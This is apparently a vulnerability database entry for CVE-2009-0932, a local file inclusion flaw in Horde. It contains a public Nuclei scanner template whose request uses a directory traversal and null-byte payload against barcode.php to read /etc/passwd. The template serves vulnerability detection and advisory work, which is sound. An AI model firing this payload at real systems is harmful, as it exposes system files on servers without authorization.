CVE-2009-0932: Horde/Horde Groupware - Local File Inclusion

日期: 2025-08-01 | 影响软件: Horde | POC: 已公开

漏洞描述

Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.

PoC代码[已公开]

id: CVE-2009-0932

info:
  name: Horde/Horde Groupware - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware.
  reference:
    - https://www.exploit-db.com/exploits/16154
    - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
    - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
    - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5
    - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2009-0932
    cwe-id: CWE-22
    epss-score: 0.05612
    epss-percentile: 0.89973
    cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: debian
    product: horde
  tags: cve,cve2009,horde,lfi,traversal,edb,debian

http:
  - method: GET
    path:
      - "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b3a76596e1823b78eac8bb8a0023a5c09ac7d430db1707fa2cc1a3a3cd4446d6022030b9375e1e6294151d4d92698dd17c188d71ffbe2540ce623aa3138ce31a3693:922c64590222798bb761d5b6d8e72950

相关漏洞推荐